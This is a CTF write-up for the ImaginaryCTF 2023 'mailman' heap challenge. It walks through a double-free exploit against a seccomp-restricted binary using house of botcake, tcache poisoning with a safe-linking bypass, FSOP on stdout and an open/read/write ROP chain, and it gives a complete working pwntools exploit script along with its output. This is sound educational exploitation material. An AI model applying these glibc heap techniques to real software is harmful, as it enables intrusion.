mailman#

mailman (423 pts) - 31 solves by Eth007

Description

I’m sure that my post office is 100% secure! It uses some of the latest software, unlike some of the other post offices out there… Flag is in ./flag.txt.

Attachments https://imaginaryctf.org/r/PIxtO#vuln https://imaginaryctf.org/r/c9Mk8#libc.so.6

nc mailman.chal.imaginaryctf.org 1337

mailman is a heap challenge I did for the ImaginaryCTF 2023 event. It was a basic heap challenge involving tcache poisoning, safe-linking and seccomp bypass. You can find the related files there.

TL;DR#

Trivial heap and libc leak
tcache poisoning to hiijack stdout
FSOP on stdout to leak environ
tcache poisoning on the fgets’s stackframe
ROPchain that takes care of the seccomp
PROFIT

Code review#

First let’s take at the version of the libc and at the protections inabled onto the binary.

1
$ checksec --file vuln
2
[*] '/home/alexis/Documents/pwn/ImaginaryCTF/mailman/vuln'
3
    Arch:     amd64-64-little
4
    RELRO:    Full RELRO
5
    Stack:    Canary found
6
    NX:       NX enabled
7
    PIE:      PIE enabled
8
$ checksec --file libc.so.6
9
[*] '/home/alexis/Documents/pwn/ImaginaryCTF/mailman/libc.so.6'
10
    Arch:     amd64-64-little
11
    RELRO:    Partial RELRO
12
    Stack:    Canary found
13
    NX:       NX enabled
14
    PIE:      PIE enabled
15
$ ./libc.so.6
16
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
17
Copyright (C) 2022 Free Software Foundation, Inc.
18
This is free software; see the source for copying conditions.
19
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
20
PARTICULAR PURPOSE.
21
Compiled by GNU CC version 11.2.0.
22
libc ABIs: UNIQUE IFUNC ABSOLUTE
23
For bug reporting instructions, please see:
24
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
25
$ seccomp-tools dump ./vuln
26
 line  CODE  JT   JF      K
27
=================================
28
 0000: 0x20 0x00 0x00 0x00000004  A = arch
29
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
30
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
31
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
32
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
33
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
34
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
35
 0007: 0x15 0x02 0x00 0x00000002  if (A == open) goto 0010
36
 0008: 0x15 0x01 0x00 0x00000005  if (A == fstat) goto 0010
37
 0009: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0011
38
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
39
 0011: 0x06 0x00 0x00 0x00000000  return KILL

Full prot for the binary and classic partial RELRO for the already up-to-date libc. The binary loads a seccomp that allows only the read, write, open, fstat and exit system calls.

By reading the code in IDA the main looks like this:

1
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
2
{
3
  void *v3; // rax
4
  int v4; // [rsp+Ch] [rbp-24h] BYREF
5
  size_t size; // [rsp+10h] [rbp-20h] BYREF
6
  __int64 v6; // [rsp+18h] [rbp-18h]
7
  __int64 v7; // [rsp+20h] [rbp-10h]
8
  unsigned __int64 v8; // [rsp+28h] [rbp-8h]
9

10
  v8 = __readfsqword(0x28u);
11
  v6 = seccomp_init(0LL, argv, envp);
12
  seccomp_rule_add(v6, 2147418112LL, 2LL, 0LL);
13
  seccomp_rule_add(v6, 2147418112LL, 0LL, 0LL);
14
  seccomp_rule_add(v6, 2147418112LL, 1LL, 0LL);
15
  seccomp_rule_add(v6, 2147418112LL, 5LL, 0LL);
16
  seccomp_rule_add(v6, 2147418112LL, 60LL, 0LL);
17
  seccomp_load(v6);
18
  setbuf(stdin, 0LL);
19
  setbuf(stdout, 0LL);
20
  puts("Welcome to the post office.");
21
  puts("Enter your choice below:");
22
  puts("1. Write a letter");
23
  puts("2. Send a letter");
24
  puts("3. Read a letter");
25
  while ( 1 )
26
  {
27
    while ( 1 )
28
    {
29
      printf("> ");
30
      __isoc99_scanf("%d%*c", &v4);
31
      if ( v4 != 3 )
32
        break;
33
      v7 = inidx();
34
      puts(*((const char **)&mem + v7));
35
    }
36
    if ( v4 > 3 )
37
      break;
38
    if ( v4 == 1 )
39
    {
40
      v7 = inidx();
41
      printf("letter size: ");
42
      __isoc99_scanf("%lu%*c", &size);
43
      v3 = malloc(size);
44
      *((_QWORD *)&mem + v7) = v3;
45
      printf("content: ");
46
      fgets(*((char **)&mem + v7), size, stdin);
47
    }
48
    else
49
    {
50
      if ( v4 != 2 )
51
        break;
52
      v7 = inidx();
53
      free(*((void **)&mem + v7));
54
    }
55
  }
56
  puts("Invalid choice!");
57
  _exit(0);
58
}

The program allows to create a chunk of any size, filling it with user-supplied input with fgets. We can print its content or free it. The bug lies in the free handler that doesn’t check if a chunk has already been free’d.

Exploitation#

Before bypassing the seccomp we need to get code execution, to do so I will use the very classic exploitation flow: FSOP stdout to leak environ => ROPchain. I could have used an angry FSOP to directly get code execution by hijjacking the vtable used by the wide operations in stdout, given actually it is not checked against a specific address range as it is the case for the _vtable. To get code execution, we need to get the heap and libc base addresses.

Heap and libc leak#

To get a heap leak we can simply do defeat safe-linking:

1
# leak
2

3
free(0)
4
view(0)
5

6
heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12) - 0x2000)
7
pwn.log.info(f"heap @ {hex(heap)}")

To get an arbitrary read / write I used the house of botcake technique. I already talked about it more deeply there. During this house I put a chunk in the unsortedbin, leaking the libc:

1
add(0, 0x100, b"YY")
2

3
add(7, 0x100, b"YY") # prev
4
add(8, 0x100, b"YY") # a
5

6
# fill tcache
7
for i in range(7):
8
    free(i)
9

10
for _ in range(20):
11
    add(9, 0x10, b"/bin/sh\0") # barrier
12

13
free(8) # free(a) => unsortedbin
14
free(7) # free(prev) => merged with a
15

16
# leak libc
17
view(8)
18

19
libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # offset of the unsorted bin
20
pwn.log.success(f"libc: {hex(libc.address)}")

House of botcake for the win#

The house of botcake is very easy to understand, it is useful when you can trigger some double free bug. It is basically:

Allocate 7 0x100 sized chunks to then fill the tcache (7 entries).
Allocate two more 0x100 sized chunks (prev and a in the example).
Allocate a small “barrier” 0x10 sized chunk.
Fill the tcache by freeing the first 7 chunks.
free(a), thus a falls into the unsortedbin.
free(prev), thus prev is consolidated with a to create a large 0x221 sized chunk that is remains in the unsortedbin.
Request one more 0x100 sized chunk to let a single entry available in the tcache.
free(a) again, given a is part of the large 0x221 sized chunk it leads to an UAF. Thus a falls into the tcache.
That’s finished, to get a write what where we just need to request a 0x130 sized chunk. Thus we can hiijack the next fp of a that is currently referenced by the tcache by the location we wanna write to. And next time two 0x100 sized chunks are requested, the second one will be the target location.

Which gives:

1
for i in range(7):
2
    add(i, 0x100, b"")
3

4
# leak
5

6
free(0)
7
view(0)
8

9
heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12) - 0x2000)
10
pwn.log.info(f"heap @ {hex(heap)}")
11

12
add(0, 0x100, b"YY")
13

14
add(7, 0x100, b"YY") # prev
15
add(8, 0x100, b"YY") # a
16

17
# fill tcache
18
for i in range(7):
19
    free(i)
20

21
for _ in range(20):
22
    add(9, 0x10, b"/bin/sh\0") # barrier
23

24
free(8) # free(a) => unsortedbin
25
free(7) # free(prev) => merged with a
26

27
# leak libc
28
view(8)
29

30
libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # offset of the unsorted bin
31
pwn.log.success(f"libc: {hex(libc.address)}")
32

33
stdout = libc.address + 0x21a780
34
environ = libc.address + 0x2a72d0 + 8
35
strr = libc.address + 0x1bd460
36

37
pwn.log.success(f"environ: {hex(environ)}")
38
pwn.log.success(f"stdout: {hex(stdout)}")
39

40
add(0, 0x100, b"YY") # pop a chunk from the tcache to let an entry left to a
41
free(8) # free(a) => tcache
42

43
# unsortedbin => oob on a => tcache poisoning
44
add(1, 0x130, b"T"*0x108 + pwn.p64(0x111) + pwn.p64(((stdout) ^ ((heap + 0x2b90) >> 12))))
45
add(2, 0x100, b"TT")
46

47
# tcache => stdout

Then, at the next 0x100 request stdout will be returned! Something important to notice if you’re a beginner in heap exploitation is how the safe-linking is handled, you have to xor the target location with ((chunk_location) >> 12)). Sometimes the result is not properly aligned leading to a crash, to avoid this you can add or sub 0x8 to your target location.

FSOP on stdout#

To leak the address of the stack we can use a FSOP on stdout. To understand how a such attack does work I advice you to read my this write-up. The goal is to read the stack address stored at libc.sym.environ within the libc. Which gives:

1
# tcache => stdout
2
add(3, 0x100, pwn.flat(0xfbad1800, # _flags
3
                        libc.sym.environ, # _IO_read_ptr
4
                        libc.sym.environ, # _IO_read_end
5
                        libc.sym.environ, # _IO_read_base
6
                        libc.sym.environ, # _IO_write_base
7
                        libc.sym.environ + 0x8, # _IO_write_ptr
8
                        libc.sym.environ + 0x8, # _IO_write_end
9
                        libc.sym.environ + 0x8, # _IO_buf_base
10
                        libc.sym.environ + 8 # _IO_buf_end
11
                        )
12
    )
13

14
stack = pwn.u64(io.recv(8)[:-1].ljust(8, b"\x00")) - 0x160 # stackframe of fgets
15
pwn.log.info(f"stack: {hex(stack)}")

PROFIT#

Now we leaked everything we just need to reuse the arbitrary write provided thanks to the house of botcake, given we already have overlapping chunks, to get another arbitrary write we just need to put the large chunk in a large tcache and the overlapped chunk in the 0x100 tcache, then we just have to corrupt victim->fp to the saved rip of the fgets stackframe :). It gives:

1
rop = pwn.ROP(libc, base=stack)
2

3
# ROPchain
4
rop(rax=pwn.constants.SYS_open, rdi=stack + 0xde + 2 - 0x18, rsi=pwn.constants.O_RDONLY) # open
5
rop.call(rop.find_gadget(["syscall", "ret"]))
6
rop(rax=pwn.constants.SYS_read, rdi=3, rsi=(stack & ~0xfff), rdx=0x300) # file descriptor bf ...
7
rop.call(rop.find_gadget(["syscall", "ret"]))
8

9
rop(rax=pwn.constants.SYS_write, rdi=1, rsi=(stack & ~0xfff), rdx=0x50) # write
10
rop.call(rop.find_gadget(["syscall", "ret"]))
11
rop.raw("./flag.txt\x00")
12

13
# victim => tcache
14
free(8)
15

16
# prev => tcache 0x140
17
free(7)
18

19
# tcache poisoning
20
add(5, 0x130, b"T"*0x100 + pwn.p64(0) + pwn.p64(0x111) + pwn.p64(((stack - 0x28) ^ ((heap + 0x2b90) >> 12))))
21
add(2, 0x100, b"TT") # dumb
22

23
print(rop.dump())
24
add(3, 0x100, pwn.p64(0x1337)*5 + rop.chain())
25

26
io.interactive()

Which gives:

1
$ python3 exploit.py REMOTE HOST=mailman.chal.imaginaryctf.org PORT=1337
2
[*] '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/vuln'
3
    Arch:     amd64-64-little
4
    RELRO:    Full RELRO
5
    Stack:    Canary found
6
    NX:       NX enabled
7
    PIE:      PIE enabled
8
[*] '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/libc.so.6'
9
    Arch:     amd64-64-little
10
    RELRO:    Partial RELRO
11
    Stack:    Canary found
12
    NX:       NX enabled
13
    PIE:      PIE enabled
14
[*] '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/ld-linux-x86-64.so.2'
15
    Arch:     amd64-64-little
16
    RELRO:    Partial RELRO
17
    Stack:    No canary found
18
    NX:       NX enabled
19
    PIE:      PIE enabled
20
[+] Opening connection to mailman.chal.imaginaryctf.org on port 1337: Done
21
[*] heap @ 0x5611bbf93000
22
[+] libc: 0x7f6b49fec000
23
[+] environ: 0x7f6b4a2932d8
24
[+] stdout: 0x7f6b4a206780
25
[*] stack: 0x7fff28533ba8
26
[*] Loaded 218 cached gadgets for '/home/nasm/Documents/pwn/ImaginaryCTF/mailman/libc.so.6'
27
[*] Switching to interactive mode
28
ictf{i_guess_the_post_office_couldnt_hide_the_heapnote_underneath_912b123f}

Annexes#

Final exploit:

1
#!/usr/bin/env python
2
# -*- coding: utf-8 -*-
3

4
# this exploit was generated via
5
# 1) pwntools
6
# 2) ctfmate
7

8
import os
9
import time
10
import pwn
11

12
BINARY = "vuln"
13
LIBC = "/home/alexis/Documents/pwn/ImaginaryCTF/mailman/libc.so.6"
14
LD = "/home/alexis/Documents/pwn/ImaginaryCTF/mailman/ld-linux-x86-64.so.2"
15

16
# Set up pwntools for the correct architecture
17
exe = pwn.context.binary = pwn.ELF(BINARY)
18
libc = pwn.ELF(LIBC)
19
ld = pwn.ELF(LD)
20
pwn.context.terminal = ["tmux", "splitw", "-h"]
21
pwn.context.delete_corefiles = True
22
pwn.context.rename_corefiles = False
23
pwn.context.timeout = 3
24
p64 = pwn.p64
25
u64 = pwn.u64
26
p32 = pwn.p32
27
u32 = pwn.u32
28
p16 = pwn.p16
29
u16 = pwn.u16
30
p8  = pwn.p8
31
u8  = pwn.u8
32

33
host = pwn.args.HOST or '127.0.0.1'
34
port = int(pwn.args.PORT or 1337)
35

36

37
def local(argv=[], *a, **kw):
38
    '''Execute the target binary locally'''
39
    if pwn.args.GDB:
40
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
41
    else:
42
        return pwn.process([exe.path] + argv, *a, **kw)
43

44

45
def remote(argv=[], *a, **kw):
46
    '''Connect to the process on the remote host'''
47
    io = pwn.connect(host, port)
48
    if pwn.args.GDB:
49
        pwn.gdb.attach(io, gdbscript=gdbscript)
50
    return io
51

52

53
def start(argv=[], *a, **kw):
54
    '''Start the exploit against the target.'''
55
    if pwn.args.LOCAL:
56
        return local(argv, *a, **kw)
57
    else:
58
        return remote(argv, *a, **kw)
59

60

61
gdbscript = '''
62
source ~/Downloads/pwndbg/gdbinit.py
63
b* main
64
'''.format(**locals())
65

66
def exp():
67
    io = start()
68

69
    def add(idx, size, data, noLine=False):
70
        io.sendlineafter(b"> ", b"1")
71
        io.sendlineafter(b"idx: ", str(idx).encode())
72
        io.sendlineafter(b"size: ", str(size).encode())
73

74
        if not noLine:
75
            io.sendlineafter(b"content: ", data)
76
        else:
77
            io.sendafter(b"content: ", data)
78

79
    def view(idx):
80
        io.sendlineafter(b"> ", b"3")
81
        io.sendlineafter(b"idx: ", str(idx).encode())
82

83
    def free(idx):
84
        io.sendlineafter(b"> ", b"2")
85
        io.sendlineafter(b"idx: ", str(idx).encode())
86

87
    for i in range(7):
88
        add(i, 0x100, b"")
89

90
    # leak
91

92
    free(0)
93
    view(0)
94

95
    heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12) - 0x2000)
96
    pwn.log.info(f"heap @ {hex(heap)}")
97

98
    add(0, 0x100, b"YY")
99

100
    add(7, 0x100, b"YY") # prev
101
    add(8, 0x100, b"YY") # a
102

103
    # fill tcache
104
    for i in range(7):
105
        free(i)
106

107
    for _ in range(20):
108
        add(9, 0x10, b"/bin/sh\0") # barrier
109

110
    free(8) # free(a) => unsortedbin
111
    free(7) # free(prev) => merged with a
112

113
    # leak libc
114
    view(8)
115

116
    libc.address = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # offset of the unsorted bin
117
    pwn.log.success(f"libc: {hex(libc.address)}")
118

119
    stdout = libc.address + 0x21a780
120
    environ = libc.address + 0x2a72d0 + 8
121
    strr = libc.address + 0x1bd460
122

123
    pwn.log.success(f"environ: {hex(environ)}")
124
    pwn.log.success(f"stdout: {hex(stdout)}")
125

126
    add(0, 0x100, b"YY") # pop a chunk from the tcache to let an entry left to a
127
    free(8) # free(a) => tcache
128

129
    # unsortedbin => oob on a => tcache poisoning
130
    add(
131
        1, 0x130, pwn.flat(
132
                            b"T"*0x108 + pwn.p64(0x111),
133
                           (stdout) ^ ((heap + 0x2b90) >> 12)
134
                           )
135
        )
136
    add(2, 0x100, b"TT")
137

138
    # tcache => stdout
139
    add(3, 0x100, pwn.flat(0xfbad1800, # _flags
140
                           libc.sym.environ, # _IO_read_ptr
141
                           libc.sym.environ, # _IO_read_end
142
                           libc.sym.environ, # _IO_read_base
143
                           libc.sym.environ, # _IO_write_base
144
                           libc.sym.environ + 0x8, # _IO_write_ptr
145
                           libc.sym.environ + 0x8, # _IO_write_end
146
                           libc.sym.environ + 0x8, # _IO_buf_base
147
                           libc.sym.environ + 8 # _IO_buf_end
148
                           )
149
        )
150

151
    stack = pwn.u64(io.recv(8)[:-1].ljust(8, b"\x00")) - 0x160 # stackframe of fgets
152
    pwn.log.info(f"stack: {hex(stack)}")
153

154
    rop = pwn.ROP(libc, base=stack)
155

156
    # ROPchain
157
    rop(rax=pwn.constants.SYS_open, rdi=stack + 0xde + 2 - 0x18, rsi=pwn.constants.O_RDONLY) # open
158
    rop.call(rop.find_gadget(["syscall", "ret"]))
159
    rop(rax=pwn.constants.SYS_read, rdi=3, rsi=(stack & ~0xfff), rdx=0x300) # file descriptor bf ...
160
    rop.call(rop.find_gadget(["syscall", "ret"]))
161

162
    rop(rax=pwn.constants.SYS_write, rdi=1, rsi=(stack & ~0xfff), rdx=0x50) # write
163
    rop.call(rop.find_gadget(["syscall", "ret"]))
164
    rop.raw("./flag.txt\x00")
165

166
    # victim => tcache
167
    free(8)
168

169
    # prev => tcache 0x140
170
    free(7)
171

172
    # tcache poisoning
173
    add(5, 0x130, b"T"*0x100 + pwn.p64(0) + pwn.p64(0x111) + pwn.p64(((stack - 0x28) ^ ((heap + 0x2b90) >> 12))))
174
    add(2, 0x100, b"TT") # dumb
175

176
    print(rop.dump())
177
    add(3, 0x100, pwn.p64(0x1337)*5 + rop.chain())
178

179
    io.interactive()
180

181
if __name__ == "__main__":
182
    exp()